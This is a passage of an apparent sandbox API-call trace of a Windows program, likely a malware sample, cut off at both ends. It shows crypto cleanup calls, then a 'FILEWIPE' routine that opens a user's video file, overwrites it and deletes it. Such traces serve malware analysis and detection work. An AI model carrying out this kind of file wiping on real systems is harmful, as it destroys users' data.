lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.023] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.023] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.024] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.024] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0192.024] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.024] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.024] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0192.024] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.024] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0192.024] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.029] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.029] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.029] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.034] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.034] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0192.034] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.034] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0192.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.034] CryptDestroyKey (hKey=0x90aed8) returned 1 [0192.035] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.035] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.035] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.035] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.035] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.035] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0192.035] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.035] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0192.046] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.046] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0192.046] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.046] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0192.046] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.046] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0192.046] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0192.047] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.047] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0192.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.047] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0192.047] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0192.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.047] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.047] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0192.047] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.047] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.047] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0192.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.047] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.047] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0192.047] FreeLibrary (hLibModule=0x74f20000) returned 1 [0192.047] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.048] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.048] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.049] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0192.049] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0192.049] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.050] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.050] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x46566030, ftLastWriteTime.dwHighDateTime=0x1d5dc83, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0x90ae18 [0192.050] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.050] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.050] CharLowerBuffW (in: lpsz="byte[64700]", cchLength=0xb | out: lpsz="byte[64700]") returned 0xb [0192.050] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.050] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0192.050] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.050] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0192.050] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0192.051] FreeLibrary (hLibModule=0x75c90000) returned 1 [0192.051] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.051] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.051] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0192.052] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\-aawcghzf1n-uznr9.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0192.052] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.052] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.052] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0192.052] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.053] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.053] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.053] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.053] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.053] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.053] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.053] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0192.053] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.053] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0192.053] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0192.054] FreeLibrary (hLibModule=0x75990000) returned 1 [0192.054] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.054] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0192.054] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.054] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFilePart=0x0) returned 0x42 [0192.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x17ab6f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0x90ae18 [0192.054] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0ntyy6p\\-aawcghzf1n-uznr9.mp4")) returned 1 [0192.056] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc8e0e70, ftCreationTime.dwHighDateTime=0x1d5e803, ftLastAccessTime.dwLowDateTime=0x46566030, ftLastAccessTime.dwHighDateTime=0x1d5dc83, ftLastWriteTime.dwLowDateTime=0x17ab6f80, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="-AawcGHZf1n-uzNR9.mp4", cAlternateFileName="-AAWCG~1.MP4")) returned 0 [0192.056] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0192.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0192.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0192.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0192.058] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.059] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0192.059] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0192.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0192.060] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0192.061] HeapFree (in: hHeap=0x8a0000, 